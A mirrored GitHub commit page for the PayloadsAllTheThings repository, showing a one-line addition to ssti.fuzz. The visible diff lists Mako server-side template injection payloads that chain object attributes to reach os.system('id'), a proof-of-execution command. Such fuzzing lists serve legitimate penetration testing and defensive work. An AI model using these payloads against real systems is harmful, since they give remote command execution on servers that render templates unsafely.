mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 17:02:53 +01:00
Update ssti.fuzz
This commit is contained in:
parent
d43c041983
commit
81ef493e98
1 changed files with 1 additions and 0 deletions
|
|
@ -77,3 +77,4 @@ ${self.module.cache.util.compat.inspect.linecache.os.system("id")}
|
|||
${self.template.module.runtime.util.compat.inspect.os.system("id")}
|
||||
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
|
||||
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
||||
${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
|
||||
|
|
|
|||
Loading…
Reference in a new issue